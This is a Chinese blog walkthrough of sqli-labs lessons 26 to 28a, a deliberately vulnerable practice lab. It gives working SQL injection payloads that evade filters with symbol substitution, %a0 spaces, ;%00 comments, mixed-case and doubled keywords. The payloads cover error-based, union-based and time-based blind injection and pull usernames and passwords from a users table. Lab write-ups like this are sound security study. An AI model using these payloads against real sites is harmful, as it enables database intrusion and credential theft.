sql-lib闯关之lesson26-28a

LESS26
1.观察了一波源码,发现存在好多转义,限制比较多了。

 

 

避免转义的方法:通过替换符号 

and 等价于&&
or等价于 ||
like 等价于=
<> 等价于!=

注释符用;%00替代

空格用%a0替代

法一:updatexml注入
①查找当前数据库
输入:?id=1'|| updatexml(1,concat(0x7e,database()),1) ;%00
或者输入:?id=1’ || updatexml(1,concat(0x7e,database()),1) || ‘1’ = ‘1
效果相同~

 


 

 

②查表
输入:(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=0x7365637572697479))),1) ;%00

 

 


③查字段
输入:?id=1' || updatexml(1, concat(0x7e, (select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name='users'))) ,1)  || '1'='1

 

 


④查值
输入:?id=1' || updatexml(1, concat(0x7e, (select (group_concat(  concat_ws(0x7e,username,passwoorrd)  )) from (security.users))) ,1)  || '1'='1

这种就是通过等价的符号替换,or and 以及空格
空格是通过()来满足分割的需求的。
另外其中有缺点 就是显示不全的问题 可以用 where id =x的方法来显示。
法二:利用 %a0代替空格   ;%00 代替注释符
查值
输入:?id=-1' %a0 union%a0 select%a0 1,2,(select%a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00

 

 

 





LESS26a
存在一些windows中阿帕奇的转义问题,可以再docker里运行避免问题。

观察源码后发现参数包裹不同,多了一个),另外其屏蔽了输出错误,所以不可再用updatatexml报错注入。

 

判断参数:

 

 



 替代绕过
输入:?id=0') %a0 union%a0 select%a0 1,2,(select%a0 group_concat( concat_ws( 0x7e,username,passwoorrd )) %a0from (%a0security.users)) ;%00

 

 

LESS27
观察源码发现又多了union 和select 的转义。

 
法一
空格用%a0代替,并且union和select混合大小写:
输入:?id=0' %a0 uNIon%a0 sELect%a0 1,2,select %a0(  concat_ws(0x7e,username,password)) %a0from (%a0security.users )  %a0 limit %a0 3,1   ;%00

 

 我们改变limit函数来获得所有数值。


法二
updatexml报错注入
输入:?id=1'  %a0 ||  updatexml(1, concat(0x7e, (SElect %a0  concat_ws(0x7e,username,password) from  %a0  security.users  %a0 limit %a0 1,1  ) ),1)  || %a0 '1'='1

 

 


LESS27a
这关的区别就是闭合的方法不同 改为双引号闭合,
可以使用时间盲注 %26%26 代表&&
输入:?id=1" %26%26 if( length(database())>1, 1, sleep(5)    )  %26%26 %0a  "1"="1 

 

 


LESS28
输入:?id=0')  %a0 union   %a0  select  %a0  1,2, (concat_ws(0x7e,username,password)) %a0  from  %a0   (security.users)  limit %a0  3,1 ;%00

LESS28a
这关区别变为双引号~

posted @ 2020-03-05 20:56  陈子硕  阅读(297)  评论(0编辑  收藏  举报